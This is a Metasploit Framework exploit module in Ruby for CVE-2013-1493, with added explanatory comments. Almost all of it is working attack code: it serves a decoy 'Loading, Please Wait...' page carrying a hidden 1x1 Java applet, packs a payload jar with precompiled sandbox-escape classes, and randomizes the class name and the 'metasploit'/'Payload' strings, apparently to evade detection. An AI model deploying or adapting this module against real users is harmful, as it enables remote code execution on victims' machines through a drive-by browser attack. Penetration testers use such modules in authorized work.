##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
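# Framework core and Rex support libraries; the typographic quotes in the
# pasted copy were a syntax error, plain quotes restore the original requires.
require 'msf/core'
require 'rex'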
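# Browser-exploit module for CVE-2013-1493 (Java CMM). It serves a small HTML
# page that loads an applet jar; the jar is assembled from the encoded payload
# and four precompiled classes shipped in the framework data directory.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  # Module metadata. 'DefaultTarget' belongs here, next to 'Targets'; in the
  # pasted copy it had drifted into on_request_uri, which cannot parse.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the four applet classes from the data directory and gives the entry
  # class a random name, then defers to the superclass setup.
  #
  # @raise [Errno::ENOENT] if one of the data files is missing from the install
  def setup
    @init_class           = load_class_file('Init.class')
    @leak_class           = load_class_file('Leak.class')
    @buffered_image_class = load_class_file('MyBufferedImage.class')
    @color_space_class    = load_class_file('MyColorSpace.class')

    # Same length as 'Init' so the in-place byte substitution below keeps the
    # class file the same size — presumably required for its internal length
    # fields to stay valid; confirm against the data files if they are rebuilt.
    @init_class_name = rand_text_alpha('Init'.length)
    @init_class.gsub!('Init', @init_class_name)

    super
  end

  # HTTP dispatcher: serves the applet jar for *.jar requests, the loader page
  # for directory requests, and redirects anything else to the resource root.
  #
  # @param cli [Object] client connection handed in by the HTTP server mixin
  # @param request [Object] parsed request; only +uri+ is read here
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      send_response(cli, build_jar, { 'Content-Type' => 'application/octet-stream' })
    when /\/$/
      # regenerate_payload returns nil on failure; answer 404 rather than
      # serving a page that references a jar we cannot build.
      payload = regenerate_payload(cli)
      unless payload
        print_error('Failed to generate the payload.')
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Minimal loader page: an applet tag pointing at a randomly named jar and
  # the randomized entry class.
  #
  # @return [String] HTML document
  def generate_html
    archive = "#{rand_text_alpha(8)}.jar"
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html << %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html << %Q|<applet archive="#{archive}" code="#{@init_class_name}.class" width="1" height="1">|
    html << %Q|</applet></body></html>|
    html
  end

  private

  # Assembles the applet archive: the encoded payload jar plus the four
  # exploit classes. The literal strings 'metasploit' and 'Payload' in entry
  # names and contents are replaced with random text of the same length.
  #
  # @return [Object] the jar object returned by payload.encoded_jar, manifest built
  def build_jar
    jar = payload.encoded_jar
    jar.add_file("#{@init_class_name}.class", @init_class)
    jar.add_file('Leak.class', @leak_class)
    jar.add_file('MyBufferedImage.class', @buffered_image_class)
    jar.add_file('MyColorSpace.class', @color_space_class)

    metasploit_str = rand_text_alpha('metasploit'.length)
    payload_str    = rand_text_alpha('payload'.length)
    jar.entries.each do |entry|
      entry.name.gsub!('metasploit', metasploit_str)
      entry.name.gsub!('Payload', payload_str)
      entry.data = entry.data.gsub('metasploit', metasploit_str)
      entry.data = entry.data.gsub('Payload', payload_str)
    end

    jar.build_manifest
    jar
  end

  # Reads one precompiled class shipped under data/exploits/cve-2013-1493.
  #
  # @param name [String] basename of the class file
  # @return [String] raw binary contents
  # @raise [Errno::ENOENT] if the file is not present in the install
  def load_class_file(name)
    path = File.join(Msf::Config.install_root, 'data', 'exploits', 'cve-2013-1493', name)
    File.binread(path)
  end
end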